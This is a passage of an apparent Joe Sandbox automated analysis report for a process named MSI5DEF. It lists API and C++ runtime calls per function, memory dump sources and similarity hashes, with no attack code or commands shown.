  • Part of subcall function 00AF7AF3: __EH_prolog3.LIBCMT ref: 00AF7AFA
  • Part of subcall function 00AF7AF3: std::_Lockit::_Lockit.LIBCPMT ref: 00AF7B04
  • Part of subcall function 00AF7AF3: std::_Lockit::~_Lockit.LIBCPMT ref: 00AF7B75
  • Part of subcall function 00AF7CB2: __EH_prolog3.LIBCMT ref: 00AF7CB9
  • Part of subcall function 00AF7CB2: std::_Lockit::_Lockit.LIBCPMT ref: 00AF7CC3
  • Part of subcall function 00AF7CB2: std::_Lockit::~_Lockit.LIBCPMT ref: 00AF7D34
  • Part of subcall function 00AF7C1D: __EH_prolog3.LIBCMT ref: 00AF7C24
  • Part of subcall function 00AF7C1D: std::_Lockit::_Lockit.LIBCPMT ref: 00AF7C2E
  • Part of subcall function 00AF7C1D: std::_Lockit::~_Lockit.LIBCPMT ref: 00AF7C9F
  • Part of subcall function 00AF4403: __EH_prolog3.LIBCMT ref: 00AF440A
  • Part of subcall function 00AF4403: std::_Lockit::_Lockit.LIBCPMT ref: 00AF4414
  • Part of subcall function 00AF4403: std::_Lockit::~_Lockit.LIBCPMT ref: 00AF44BB
• collate.LIBCPMT ref: 00AFDA78
• numpunct.LIBCPMT ref: 00AFDCF2
  • Part of subcall function 00AF838F: __EH_prolog3.LIBCMT ref: 00AF8396
  • Part of subcall function 00AF80C5: __EH_prolog3.LIBCMT ref: 00AF80CC
  • Part of subcall function 00AF80C5: std::_Lockit::_Lockit.LIBCPMT ref: 00AF80D6
  • Part of subcall function 00AF80C5: std::_Lockit::~_Lockit.LIBCPMT ref: 00AF8147
  • Part of subcall function 00AF81EF: __EH_prolog3.LIBCMT ref: 00AF81F6
  • Part of subcall function 00AF81EF: std::_Lockit::_Lockit.LIBCPMT ref: 00AF8200
  • Part of subcall function 00AF81EF: std::_Lockit::~_Lockit.LIBCPMT ref: 00AF8271
  • Part of subcall function 00AF4403: Concurrency::cancel_current_task.LIBCPMT ref: 00AF44C6
  • Part of subcall function 00AF75B6: __EH_prolog3.LIBCMT ref: 00AF75BD
  • Part of subcall function 00AF75B6: std::_Lockit::_Lockit.LIBCPMT ref: 00AF75C7
  • Part of subcall function 00AF75B6: std::_Lockit::~_Lockit.LIBCPMT ref: 00AF7638
• __Getcoll.LIBCPMT ref: 00AFDAB8
  • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
  • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
  • Part of subcall function 00AE84C0: LocalAlloc.KERNEL32(00000040,00000000,00B0839D,00000000,1816BA6E,?,00000000,?,00000000,?,00B2CB8D,000000FF,?,00AE17D5,00000000,00B2D3BA), ref: 00AE84C6
• codecvt.LIBCPMT ref: 00AFDDA3
Memory Dump Source
• Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
Similarity
• API ID: Lockitstd::_$H_prolog3$Lockit::_Lockit::~_$AllocConcurrency::cancel_current_taskGetcollGetctypeLocalcodecvtcollatectypenumpunct
• String ID:
• API String ID: 613171289-0
• Opcode ID: c87e984d5282d86b64ab2c4aad2688fc41f15ba5d6147ff04230ff98e784adf2
• Instruction ID: e11163b25a4b77d4c38a32340817bb95256418dc5edf49e5529200b3dbcafd4e
• Opcode Fuzzy Hash: c87e984d5282d86b64ab2c4aad2688fc41f15ba5d6147ff04230ff98e784adf2
• Instruction Fuzzy Hash: 56E1F27280021EAFDB12AFE58D0267F7EB6EF45390F15446DFA586B281EF708D109791

APIs
• __EH_prolog3.LIBCMT ref: 00AFD8FD
• ctype.LIBCPMT ref: 00AFD944
  • Part of subcall function 00AFD458: __Getctype.LIBCPMT ref: 00AFD467
• collate.LIBCPMT ref: 00AFDA78
• __Getcoll.LIBCPMT ref: 00AFDAB8
  • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
  • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
  • Part of subcall function 00AE84C0: LocalAlloc.KERNEL32(00000040,00000000,00B0839D,00000000,1816BA6E,?,00000000,?,00000000,?,00B2CB8D,000000FF,?,00AE17D5,00000000,00B2D3BA), ref: 00AE84C6
Memory Dump Source
• Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
Similarity
• API ID: Lockitstd::_$AllocGetcollGetctypeH_prolog3LocalLockit::_Lockit::~_collatectype
• String ID:
• API String ID: 735909071-0
• Opcode ID: 95811ee3d7f9f051cb7f096fb964795fd3c1b9835bd058a34932ce4bc2bb43db
• Instruction ID: cec1e9bc1565eca5f4cf46223a881631cae03b9cb011ea58523b1fe0515f364e
• Opcode Fuzzy Hash: 95811ee3d7f9f051cb7f096fb964795fd3c1b9835bd058a34932ce4bc2bb43db
• Instruction Fuzzy Hash: A4C1C1B280461E9FDB12AFE589026BF7EB6FF45390F24841DFA586B281DF708910D791

APIs
• #224.MSI(?,00000001,00000000,00000000,00000000), ref: 00AE2C43
• LocalFree.KERNEL32(?), ref: 00AE2CA2
• LocalFree.KERNEL32(?), ref: 00AE2D0C
• CertFreeCertificateContext.CRYPT32(00000000), ref: 00AE2E94
  • Part of subcall function 00AE3D60: CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 00AE3DA3
• LocalFree.KERNEL32(?), ref: 00AE2E13
• LocalFree.KERNEL32(?), ref: 00AE2E6B
Memory Dump Source
• Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
Similarity
• API ID: Free$Local$Cert$#224CertificateContextNameString
• String ID:
• API String ID: 2665452496-0
• Opcode ID: 384749e8814197e9cd6acdfcceb0c19d7daab129c00989c0cc02639a3087a0d1
• Instruction ID: d1fc2493d825fc5484f8a03babc3c93830edebc92454faa3ef72a32e60c1584a
• Opcode Fuzzy Hash: 384749e8814197e9cd6acdfcceb0c19d7daab129c00989c0cc02639a3087a0d1
• Instruction Fuzzy Hash: E4919D70910289CFDB18CFA9C958B9EBBF5FF84304F24465DD015AB291DBB5AA84CB90

APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 00AEB52D
• std::_Lockit::_Lockit.LIBCPMT ref: 00AEB550
• std::_Lockit::~_Lockit.LIBCPMT ref: 00AEB578
• std::_Facet_Register.LIBCPMT ref: 00AEB5ED
• std::_Lockit::~_Lockit.LIBCPMT ref: 00AEB617
• LocalFree.KERNEL32 ref: 00AEB6C0
Memory Dump Source
• Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_FreeLocalRegister
• String ID:
• API String ID: 1378673503-0
• Opcode ID: 8d600ce2af344f19a9ca7b78b360fb360a95305306bc81066ff0a1c846e3577a
• Instruction ID: 340cbc47e2d40d935983d33d9bc5c71538223711cb0c97d82799adeba06d4808
• Opcode Fuzzy Hash: 8d600ce2af344f19a9ca7b78b360fb360a95305306bc81066ff0a1c846e3577a
• Instruction Fuzzy Hash: 5851CE71810699DFCB20DF99D945BAEBBF4FB05320F144769E825A7390DB70AE04CBA1

APIs
Memory Dump Source
• Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
Similarity
• API ID: __freea$__alloca_probe_16
• String ID: a/p$am/pm
• API String ID: 3509577899-3206640213
• Opcode ID: f52ba3667fe19c45eb8a136ed9d4471eb6d3c9fef785bbfacf9d3da473a48a45
• Instruction ID: 28e19efe61c70414099978fe1cd68f1e7724a68ce5e21339267d088a1342763c
• Opcode Fuzzy Hash: f52ba3667fe19c45eb8a136ed9d4471eb6d3c9fef785bbfacf9d3da473a48a45
• Instruction Fuzzy Hash: 68C1F471914A06DBCB348F68D889AFAB7F0FF86314FA441E9E501AB654D3319DC1CBA1

APIs
• GetLastError.KERNEL32(?,?,00B0AEEC,00B09710,00B085A3), ref: 00B0AF03
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00B0AF11
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B0AF2A
• SetLastError.KERNEL32(00000000,00B0AEEC,00B09710,00B085A3), ref: 00B0AF7C
Memory Dump Source
• Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
• Opcode ID: 266147a4c242c6bf588a18f510c3bbcde08af698cb70ad4138334969bd313f6c
• Instruction ID: 5d45e6625c1fb1cd44da30edc651ea7b9cf73db67a860564a7364c928d5d5eba
• Opcode Fuzzy Hash: 266147a4c242c6bf588a18f510c3bbcde08af698cb70ad4138334969bd313f6c
• Instruction Fuzzy Hash: C201D47210D3226EE66427757C86B5A6ED5EB12B7072007A9F110E71F2EF919E016145

APIs
Memory Dump Source
• Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
Similarity
• API ID: Mpunct$GetvalsH_prolog3
• String ID: $+xv
• API String ID: 2204710431-1686923651
• Opcode ID: 7c9c670211423c87a7273819361dec83b087a49f350b2a33869e6d866b4be112
• Instruction ID: 33969bdb37517964050fd98d09d0e4a722fab61a11fab87edb1f535f3b2b33f5
• Opcode Fuzzy Hash: 7c9c670211423c87a7273819361dec83b087a49f350b2a33869e6d866b4be112
• Instruction Fuzzy Hash: 4A21B2B1904B966ED726DFB4849077BBFF8AB0C300B040A5AF199C7A42E734E601CB90

APIs
• GetCurrentProcess.KERNEL32(1816BA6E,1816BA6E,?,?,00000000,00B2A221,000000FF), ref: 00AE847B
  • Part of subcall function 00B07875: EnterCriticalSection.KERNEL32(00B44AF8,00000000,?,?,00AE25B6,00B4571C,1816BA6E,?,00000000,00B293ED,000000FF,?,00AE1A26), ref: 00B07880
  • Part of subcall function 00B07875: LeaveCriticalSection.KERNEL32(00B44AF8,?,?,00AE25B6,00B4571C,1816BA6E,?,00000000,00B293ED,000000FF,?,00AE1A26,?,?,?,1816BA6E), ref: 00B078BD
• GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00AE8440
• GetProcAddress.KERNEL32(00000000), ref: 00AE8447
  • Part of subcall function 00B0782B: EnterCriticalSection.KERNEL32(00B44AF8,?,?,00AE2627,00B4571C,00B2CCC0), ref: 00B07835
  • Part of subcall function 00B0782B: LeaveCriticalSection.KERNEL32(00B44AF8,?,?,00AE2627,00B4571C,00B2CCC0), ref: 00B07868
  • Part of subcall function 00B0782B: RtlWakeAllConditionVariable.NTDLL ref: 00B078DF
Memory Dump Source
• Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
Similarity
• API ID: CriticalSection$EnterLeave$AddressConditionCurrentHandleModuleProcProcessVariableWake
• String ID: IsWow64Process$kernel32
• API String ID: 2056477612-3789238822
• Opcode ID: da6d82f7a9dd9922a58a5b5c0a5b296b890b3fefea304d70b989ed74a666d4bb
• Instruction ID: 48848d365e1b6cdb90bc95a678957ada22f60d53eb995636dd2538eb5c5d61eb
• Opcode Fuzzy Hash: da6d82f7a9dd9922a58a5b5c0a5b296b890b3fefea304d70b989ed74a666d4bb
• Instruction Fuzzy Hash: 2E11A2B6D44B45EFCB20CFA4EC05B99BBE8F709720F1046AAE815932D0DF35AA00CA51
                                                                        APIs
                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,1816BA6E,?,?,00000000,00B2CBE4,000000FF,?,00B183F1,?,?,00B183C5,?), ref: 00B18496
                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B184A8
                                                                        • FreeLibrary.KERNEL32(00000000,?,00000000,00B2CBE4,000000FF,?,00B183F1,?,?,00B183C5,?), ref: 00B184CA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                        • API String ID: 4061214504-1276376045
                                                                        • Opcode ID: b80b8a89db39e1d256ad7802bb6923b5541ac2aa8d8bd04d5d9cba8cc17de934
                                                                        • Instruction ID: 290c695165753af1767e82a3fc117f95e62604bba9a2c3d598d37620befa07bf
                                                                        • Opcode Fuzzy Hash: b80b8a89db39e1d256ad7802bb6923b5541ac2aa8d8bd04d5d9cba8cc17de934
                                                                        • Instruction Fuzzy Hash: 6901AD31904A29ABDB118F54DC09BEEBBF8FB08B11F004665E811A36A0DF749900CA90
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AFDDD9
                                                                        • collate.LIBCPMT ref: 00AFDF54
                                                                        • numpunct.LIBCPMT ref: 00AFE1CE
                                                                          • Part of subcall function 00AF83C2: __EH_prolog3.LIBCMT ref: 00AF83C9
                                                                          • Part of subcall function 00AF815A: __EH_prolog3.LIBCMT ref: 00AF8161
                                                                          • Part of subcall function 00AF815A: std::_Lockit::_Lockit.LIBCPMT ref: 00AF816B
                                                                          • Part of subcall function 00AF815A: std::_Lockit::~_Lockit.LIBCPMT ref: 00AF81DC
                                                                          • Part of subcall function 00AEEAF0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEEB1D
                                                                          • Part of subcall function 00AEEAF0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEEB40
                                                                          • Part of subcall function 00AEEAF0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEEB68
                                                                          • Part of subcall function 00AEEAF0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEEC07
                                                                          • Part of subcall function 00AF4403: Concurrency::cancel_current_task.LIBCPMT ref: 00AF44C6
                                                                          • Part of subcall function 00AF764B: __EH_prolog3.LIBCMT ref: 00AF7652
                                                                          • Part of subcall function 00AF764B: std::_Lockit::_Lockit.LIBCPMT ref: 00AF765C
                                                                          • Part of subcall function 00AF764B: std::_Lockit::~_Lockit.LIBCPMT ref: 00AF76CD
                                                                        • __Getcoll.LIBCPMT ref: 00AFDF94
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                          • Part of subcall function 00AE84C0: LocalAlloc.KERNEL32(00000040,00000000,00B0839D,00000000,1816BA6E,?,00000000,?,00000000,?,00B2CB8D,000000FF,?,00AE17D5,00000000,00B2D3BA), ref: 00AE84C6
                                                                          • Part of subcall function 00AEB9E0: __Getctype.LIBCPMT ref: 00AEB9EB
                                                                          • Part of subcall function 00AF7A5E: __EH_prolog3.LIBCMT ref: 00AF7A65
                                                                          • Part of subcall function 00AF7A5E: std::_Lockit::_Lockit.LIBCPMT ref: 00AF7A6F
                                                                          • Part of subcall function 00AF7A5E: std::_Lockit::~_Lockit.LIBCPMT ref: 00AF7AE0
                                                                          • Part of subcall function 00AF7B88: __EH_prolog3.LIBCMT ref: 00AF7B8F
                                                                          • Part of subcall function 00AF7B88: std::_Lockit::_Lockit.LIBCPMT ref: 00AF7B99
                                                                          • Part of subcall function 00AF7B88: std::_Lockit::~_Lockit.LIBCPMT ref: 00AF7C0A
                                                                          • Part of subcall function 00AF7DDC: __EH_prolog3.LIBCMT ref: 00AF7DE3
                                                                          • Part of subcall function 00AF7DDC: std::_Lockit::_Lockit.LIBCPMT ref: 00AF7DED
                                                                          • Part of subcall function 00AF7DDC: std::_Lockit::~_Lockit.LIBCPMT ref: 00AF7E5E
                                                                          • Part of subcall function 00AF7D47: __EH_prolog3.LIBCMT ref: 00AF7D4E
                                                                          • Part of subcall function 00AF7D47: std::_Lockit::_Lockit.LIBCPMT ref: 00AF7D58
                                                                          • Part of subcall function 00AF7D47: std::_Lockit::~_Lockit.LIBCPMT ref: 00AF7DC9
                                                                          • Part of subcall function 00AF4403: __EH_prolog3.LIBCMT ref: 00AF440A
                                                                          • Part of subcall function 00AF4403: std::_Lockit::_Lockit.LIBCPMT ref: 00AF4414
                                                                          • Part of subcall function 00AF4403: std::_Lockit::~_Lockit.LIBCPMT ref: 00AF44BB
                                                                        • codecvt.LIBCPMT ref: 00AFE27F
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3$AllocConcurrency::cancel_current_taskGetcollGetctypeLocalcodecvtcollatenumpunct
                                                                        • String ID:
                                                                        • API String ID: 2252558201-0
                                                                        • Opcode ID: dd633218912352d6630e403b56112e70d36438235bee3b52a946a9544ee62222
                                                                        • Instruction ID: d964d62098f56afb174bc06179d2dd923772b5b4638bd48e9057a80981c68653
                                                                        • Opcode Fuzzy Hash: dd633218912352d6630e403b56112e70d36438235bee3b52a946a9544ee62222
                                                                        • Instruction Fuzzy Hash: CCE1F2B180021EAFDB22AFE58D02ABF7EB5EF55350F10452DFA586B291EF308D109791
                                                                        APIs
                                                                        • __alloca_probe_16.LIBCMT ref: 00B1C409
                                                                        • __alloca_probe_16.LIBCMT ref: 00B1C4CA
                                                                        • __freea.LIBCMT ref: 00B1C531
                                                                          • Part of subcall function 00B1B127: HeapAlloc.KERNEL32(00000000,?,?,?,00B1AAAA,?,00000000,?,00B0C282,?,?,?,?,?,?,00AE1668), ref: 00B1B159
                                                                        • __freea.LIBCMT ref: 00B1C546
                                                                        • __freea.LIBCMT ref: 00B1C556
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                        • String ID:
                                                                        • API String ID: 1096550386-0
                                                                        • Opcode ID: 68792685a7211e3b3520e25abed038c4b51808af3caa3ffc9a16572e37f400d4
                                                                        • Instruction ID: d8121122cc17050217b18bfecc03ac24d55559505132ed72d6c9164b2e9bfe44
                                                                        • Opcode Fuzzy Hash: 68792685a7211e3b3520e25abed038c4b51808af3caa3ffc9a16572e37f400d4
                                                                        • Instruction Fuzzy Hash: ED51C472640116AFEF215F64DC82EFF7EE9EF54354B9501A8FD08D6241EB30ED9086A0
                                                                        APIs
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AEC5BD
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AEC5E0
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AEC608
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AEC67D
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AEC6A7
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                        • String ID:
                                                                        • API String ID: 459529453-0
                                                                        • Opcode ID: 78a16a2ba9d5609fc58c0491c22ef86bd4f5c323e3a6d131226c9795cea1743f
                                                                        • Instruction ID: e5ac357ed730b0842dcfe68eb841684962abe3f89884ce76c0d8a37346c54591
                                                                        • Opcode Fuzzy Hash: 78a16a2ba9d5609fc58c0491c22ef86bd4f5c323e3a6d131226c9795cea1743f
                                                                        • Instruction Fuzzy Hash: B241DF75800699DFCF11DFA8D940BAEBBB4FF05320F184269E914AB391DB34AE05CB91
                                                                        APIs
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AEEB1D
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AEEB40
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AEEB68
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AEEBDD
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AEEC07
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                        • String ID:
                                                                        • API String ID: 459529453-0
                                                                        • Opcode ID: 46483c96ce90db6a4a5d7dab21ee94961dab64b0ccb373af0dcc8800637f8d89
                                                                        • Instruction ID: cab87381c40f54460373d469bd958b1eed9e8c4ba381adffd3505215aa3dde52
                                                                        • Opcode Fuzzy Hash: 46483c96ce90db6a4a5d7dab21ee94961dab64b0ccb373af0dcc8800637f8d89
                                                                        • Instruction Fuzzy Hash: 4941F371C00699DFCB11CFA8D940BAEBBB4FB05720F148299E915A7391DB30AE04CBD1
                                                                        APIs
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AEEC5D
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AEEC80
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AEECA8
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AEED1D
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AEED47
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                        • String ID:
                                                                        • API String ID: 459529453-0
                                                                        • Opcode ID: b111e3dfa119a8bc6dbb74fba7d433a5c9a3af71e68369936ec5d18ce5ec69e7
                                                                        • Instruction ID: 6332e0a9fff6e8fb9ae0bda4aaf40f8e34f0f149164d277d737f4af3e5764b70
                                                                        • Opcode Fuzzy Hash: b111e3dfa119a8bc6dbb74fba7d433a5c9a3af71e68369936ec5d18ce5ec69e7
                                                                        • Instruction Fuzzy Hash: 4841FF71C00699DFCB21CFA8D980BAEBBB4FB41724F244259E915A7391DB30AE04CBD1
                                                                        APIs
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AEED9D
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AEEDC0
